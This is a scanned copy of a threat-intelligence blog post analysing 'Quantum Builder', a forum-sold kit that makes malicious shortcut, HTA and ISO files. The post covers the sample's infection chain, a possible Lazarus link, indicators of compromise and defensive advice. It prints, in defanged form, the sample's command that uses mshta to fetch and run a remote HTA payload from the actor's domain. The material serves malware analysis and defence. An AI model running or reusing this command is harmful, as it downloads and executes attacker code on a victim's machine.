cyble.com
Open in
urlscan Pro
192.0.78.152
Public Scan
Submitted URL: https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/
Effective URL: https://cyble.com/blog/quantum-software-lnk-file-based-builders-growing-in-popularity/
Submission: On November 11 via api from IN — Scanned from DE
Effective URL: https://cyble.com/blog/quantum-software-lnk-file-based-builders-growing-in-popularity/
Submission: On November 11 via api from IN — Scanned from DE
Form analysis 2 forms found in the DOM
GET https://cyble.com/
<form role="search" method="get" class="search-form" action="https://cyble.com/" data-cb-wrapper="true">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search..." value="" name="s" tabindex="-1">
</label>
<input type="submit" class="search-submit" value="Search">
</form><form id="jp-carousel-comment-form" data-cb-wrapper="true">
<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
<textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
<div id="jp-carousel-comment-form-submit-and-info-wrapper">
<div id="jp-carousel-comment-form-commenting-as">
<fieldset>
<label for="jp-carousel-comment-form-email-field">Email</label>
<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-author-field">Name</label>
<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-url-field">Website</label>
<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
</fieldset>
</div>
<input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
</div>
</form>Text Content
Skip to content
The Q3, 2023 Ransomware Report is Now Available. Download Now
The Q3, 2023 Ransomware Report is Now Available. Download Now
Report an Incident | Get Support
* Home
* ProductsMenu Toggle
* For Enterprises(B2B) and GovernmentsMenu Toggle
* Cyble Vision
Secure your business from emerging threats and limit opportunities for
your adversaries.
* Cyble Hawk
Protects ultra sensitive data and assets.
* For Enterprises(B2B) and Individuals(B2C)Menu Toggle
* AmIBreached
Enables consumers and organizations to Identify, Prioritize and Mitigate
darkweb risks.
* Cyble Odin
Meet The All-Father of Internet Scanning
* The Cyber Express
#1 Trending Cyber Security News and Magazine
* We’ve just released an update!
CHECK OUT THE ALL NEW DASHBOARD VIEW ON CYBLE VISION.
* SolutionsMenu Toggle
* Function WiseMenu Toggle
* Attack Surface Management
* Brand Intelligence
* Cyber Threat Intelligence
* Dark Web & Deep Web
* Vulnerability Management
* Takedown and Disruption
* Industry WiseMenu Toggle
* Financial Services
* Retail and CPG
* Healthcare & Pharmaceuticals
* Technology Industry
* Educational Platform
* Role WiseMenu Toggle
* Information Security
* Corporate Security
* Marketing
* ResourcesMenu Toggle
* Blog
* Knowledge Hub
* Case Studies
* Research Reports
* Whitepapers
* SAMA Compliance
* Press
* Careers
* PartnersMenu Toggle
* Partner Network
* Partner Login
* Become a Partner
* About Us
Talk to Sales
Schedule a Demo
Schedule a Demo
CYBLE IS NOW A SERIES B COMPANY. LEARN MORE
Main Menu
* Home
* ProductsMenu Toggle
* For Enterprises(B2B) and GovernmentsMenu Toggle
* Cyble Vision
Secure your business from emerging threats and limit opportunities for
your adversaries.
* Cyble Hawk
Protects ultra sensitive data and assets.
* For Enterprises(B2B) and Individuals(B2C)Menu Toggle
* AmIBreached
Enables consumers and organizations to Identify, Prioritize and Mitigate
darkweb risks.
* Cyble Odin
Meet The All-Father of Internet Scanning
* The Cyber Express
#1 Trending Cyber Security News and Magazine
* We’ve just released an update!
CHECK OUT THE ALL NEW DASHBOARD VIEW ON CYBLE VISION.
* SolutionsMenu Toggle
* Function WiseMenu Toggle
* Attack Surface Management
* Brand Intelligence
* Cyber Threat Intelligence
* Dark Web & Deep Web
* Vulnerability Management
* Takedown and Disruption
* Industry WiseMenu Toggle
* Financial Services
* Retail and CPG
* Healthcare & Pharmaceuticals
* Technology Industry
* Educational Platform
* Role WiseMenu Toggle
* Information Security
* Corporate Security
* Marketing
* ResourcesMenu Toggle
* Blog
* Knowledge Hub
* Case Studies
* Research Reports
* Whitepapers
* SAMA Compliance
* Press
* Careers
* PartnersMenu Toggle
* Partner Network
* Partner Login
* Become a Partner
* About Us
QUANTUM SOFTWARE: LNK FILE-BASED BUILDERS GROWING IN POPULARITY
June 22, 2022
POSSIBLY ASSOCIATED WITH LAZARUS APT GROUP
Cyble Research Labs has constantly been tracking emerging threats and their
delivery mechanisms. We have observed a surge in the use of .lnk files by
various malware families. Some of the prevalent malware families using .lnk
files for their payload delivery of late are:
* Emotet
* Bumblebee
* Qbot
* Icedid
Additionally, we have seen many APT instances where the Threat Actors (TAs)
leverage .lnk files for their initial execution to deliver the payload.
Technical Content! Subscribe to Unlock
Sign up and get access to Cyble Research and Intelligence Labs' exclusive
contents
Email
Unlock this Content
.lnk files are shortcut files that reference other files, folders, or
applications to open them. The TAs leverages the .lnk files and drops malicious
payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries that
are native to Operating Systems such as PowerShell and mshta. TAs can use these
types of binaries to evade detection mechanisms as these binaries are trusted by
Operating Systems.
During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came
across a new. lnk builder dubbed “Quantum Software/Quantum Builder.” Figure 1
shows a post made by the Threat Actor on a cybercrime forum.
Figure 1 – Post made by TA on a cybercrime forum
The TA claims that Quantum Builder can spoof any extension and has over 300
different icons available for malicious .lnk files. Figure 2 shows the pricing
details and functionality of the builder.
Figure 2 – Functionality and pricing details
The TA has created a video demonstrating how to build .lnk, .hta, and .iso files
using the Quantum Builder. The .hta payload can be created using Quantum Builder
by customizing options such as payload URL details, DLL support, UAC Bypass,
execution path and time delay to execute the payload, etc.
Figure 3 – .hta builder
The .lnk builder embeds the generated .hta payload and creates a new .lnk file.
The builder provides various icons as an option while building the .lnk file.
The below figure shows the Quantum .lnk builder.
Figure 4 – .lnk builder
At the end of this process, the .iso builder is used to create the .iso image
containing the .lnk file for further delivery via email and execution.
Figure 5 – .iso builder
The TA has also claimed to have implemented a dogwalk n-day exploit. This
vulnerability exists in Microsoft Support Diagnostic Tool (MSDT) and could lead
to code execution if the user opens a specially crafted .diagcab file, typically
sent over emails by TAs. The .diagcab file further downloads a malicious file
into the startup folder, which will be executed every time the user logs in.
Figure 6 – DogWalk implementation
TECHNICAL ANALYSIS
Further investigation revealed a post shared by the TA, indicating that this
sample might be generated using Quantum Builder.
(SHA256: 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25).
The figure below shows the post made by the TA regarding the above sample.
Figure 7 – Twitter post linked by TA on a cybercrime forum
The sample mentioned in the above post connects to a domain named
“quantum-software.online”; the same domain was used by quantum TA as a demo
site, as mentioned in the figure below. This indicates that the identified hash
is generated using the quantum builder.
Figure 8 – Demo site used by TA
This sample is a Windows Shortcut (.LNK) file. By default, Windows hides the
.lnk extension, so if a file is named as file_name.txt.lnk, then only
file_name.txt will be visible to the user even if the show file extension
optionis enabled. For such reasons, this might be an attractive option for TAs,
using the .lnk files as a disguise or smokescreen.
Figure 9 – File details
Upon execution, the .Ink file runs the malicious PowerShell code, which executes
a .hta file hosted in the remote site using mshta.
This script uses a function that deobfuscates the malicious PowerShell script.
The function performs a mathematical operation that converts a numeric value
into characters. The figure below shows the deobfuscated data.
Figure 10 – De-obfuscated data
Command: “C:\Windows\system32\mshta.exe”
hxxps[:]//quantum-software[.]online/remote/bdg[.]hta
The infection chain is represented below.
Figure 11 – Infection Chain
POSSIBLE LINKS TO LAZARUS APT
In recent samples and research conducted on Lazarus APT, we observed that TAs
were using .Lnk for delivering further stage payloads. Upon comparing both
scripts, we found that the deobfuscation loop and initialization of variables
were the same, indicating the possibility of a connection between Quantum
Builder and Lazarus APT group.
Figure 12 – Similar PowerShell script
CONCLUSION
We have observed a steadily increasing number of high-profile TAs shifting back
to .lnk files to deliver their payloads. Typically, TAs use LOLBins in such
infection mechanisms because it makes detecting malicious activity significantly
harder.
The MSDT zero-day vulnerability, which researchers recently discovered, was also
exploiting a LOLBin. Within a short window from this incident being observed in
the wild, TAs have leveraged this vulnerability using different attack vectors.
The TA behind Quantum Builder appears to be updating the malicious tool with new
attack techniques, making it more attractive to other TAs. We will likely see
more usage of such tools in the near future.
OUR RECOMMENDATIONS
We have listed some essential cybersecurity best practices that create the first
line of control against attackers. We recommend that our readers follow the best
practices given below:
* Refrain from opening untrusted links and email attachments without verifying
their authenticity.
* Use strong passwords and enforce multi-factor authentication wherever
possible.
* Verify the source of files before executing them.
* Turn on the automatic software update feature on your computer, mobile, and
other connected devices wherever possible and pragmatic.
* Use a reputed anti-virus and Internet security software package on your
connected devices, including PC, laptop, and mobile.
* Conduct regular backup practices and keep those backups offline or in a
separate network.
MITRE ATT&CK® TECHNIQUES
Tactic Technique ID Technique Name Initial
Access T1566 Phishing Execution T1204
T1059 User Execution
Command and Scripting Interpreter Defense EvasionT1218
T1140System Binary Proxy Execution
Deobfuscate/Decode Files or Information
INDICATORS OF COMPROMISE (IOCS)
Indicators Indicator Type Description 04e8a5c6e5797b0f436ca36452170a2f
924be824edb54f917d52e43a551c0eb2848cad8f
2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25 MD5
SHA-1 SHA-256 .lnk
filehxxps[:]//quantum-software[.]online/remote/bdg[.]htaDomainMalicious
Domain52b0b06ab4cf6c6b1a13d8eec2705e3b
dfdde88da020e584038d2656d0e3d48cfae27b1a
b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1MD5
SHA-1 SHA-256 Lazarus .lnk file
RELATED
EMOTET RETURNS WITH NEW TTPS AND DELIVERS .LNK FILES TO ITS VICTIMS
The .lnk file further executes VBScript or PowerShell script to download the
Emotet payload in the victims' machine.
April 27, 2022
In "Malware"
UNVEILING THE STEALTHY EXPLOITATION OF MICROSOFT CMSTP USING MALICIOUS LNK FILES
Cyble Research & Intelligence Labs analyzes an infection chain leveraging CMSTP
for executing malware payloads.
August 23, 2023
In "Trojan"
NOTORIOUS SIDECOPY APT GROUP SETS SIGHTS ON INDIA’S DRDO
CRIL analyzes an ongoing campaign by SideCopy APT group targeting the Defense
Research and Development Organization(DRDO) of the Indian government.
March 21, 2023
In "APT"
Post navigation
← Previous Post
Next Post →
RELATED POSTS
NGROK PLATFORM ABUSED BY HACKERS TO DELIVER A NEW WAVE OF PHISHING ATTACKS
5 Comments / Darkweb, Malware / By cybleinc
Cyble's research team has found an uptick in phishing campaigns targeting
multiple organizations, including financial institutes, by abusing the ngrok
platform, a secure and introspectable…
Read More »
CONFUCIUS APT ANDROID SPYWARE TARGETS PAKISTANI AND OTHER SOUTH ASIAN REGIONS
All, Malware / By cybleinc
Two Android spyware strains named Hornbill and SunBird were recently discovered
with possible connections to the advanced persistent threat (APT) group called
Confucius. The group…
Read More »
Comments are closed.
Search for:
RECENT POSTS
* Active Exploitation of Big-IP and Citrix vulnerabilities observed by Cyble
Global Sensor Intelligence Network
* New Open-Source ‘Trap Stealer’ Pilfers Data in just 6 Seconds
* New Java-Based Sayler RAT Targets Polish Speaking Users
* DoNot APT expands its arsenal to spy on victim’s VoIP calls
* Higaisa APT Resurfaces via Phishing Website targeting Chinese Users
CATEGORIES
* 2020
* 2021
* 2022
* 2023
* Adware
* All
* Android
* Annoucement
* APK Ransomware
* APT
* Banking Trojan
* Banking Trojan
* Clipper
* Cryptocurrency
* Cryptominer
* Cyberattack
* Cybercrime
* Cyberwarfare
* Darkweb
* Data Breach
* Data Leak
* DDOS
* Elasticsearch
* Exploit
* Exploit
* Fake App
* Fraud
* General
* Hacktivism
* ICS/SCADA
* Industrial Control Systems
* Infostealer
* Malware
* OSINT
* Phishing
* Press
* Ransomware
* Red Teaming
* Remote Access Trojan
* Scam
* Spyware
* Stealer
* Tech Scam
* Telecommunications
* Trojan
* Vulnerability
* Zero Day
QUICK LINKS
Main Menu
* Home
* About Us
* Blog
* Press
* Cyble Partner Network (CPN)
* Responsible Disclosure
* Knowledge Hub
* Sitemap
PRODUCTS
Main Menu
* Cyble Vision
* Cyble Hawk
* AmIBreached
* Cyble Odin
* The Cyber Express
SOLUTIONS
Main Menu
* Dark Web & Deep Web
* Attack Surface Management
* Brand Intelligence
* Cyber Threat Intelligence
* Vulnerability Management
* Takedown and Disruption
PRIVACY POLICY
Main Menu
* Cyble Vision
* AmIBreached
© 2023. Cyble Inc.(Leading Cyber Threat Intelligence Company). All Rights
Reserved
Twitter Linkedin Youtube
Scroll to Top
Loading Comments...
Write a Comment...
Email Name Website
We use cookies to ensure that we give you the best experience on our website. If
you continue to use this site we will assume that you are happy with it.Ok
×
We Value Your Privacy
Settings
NextRoll, Inc. ("NextRoll") and our advertising partners use cookies and similar
technologies on this site and use personal data (e.g., your IP address). If you
consent, the cookies, device identifiers, or other information can be stored or
accessed on your device for the purposes described below. You can click "Allow
All" or "Decline All" or click Settings above to customize your consent.
NextRoll and our advertising partners process personal data to: ● Store and/or
access information on a device; ● Create a personalized content profile; ●
Select personalised content; ● Personalized ads, ad measurement and audience
insights; ● Product development. For some of the purposes above, our advertising
partners: ● Use precise geolocation data. Some of our partners rely on their
legitimate business interests to process personal data. View our advertising
partners if you wish to provide or deny consent for specific partners, review
the purposes each partner believes they have a legitimate interest for, and
object to such processing.
If you select Decline All, you will still be able to view content on this site
and you will still receive advertising, but the advertising will not be tailored
for you. You may change your setting whenever you see the Manage consent
preferences on this site.
Decline All
Allow All
Manage consent preferences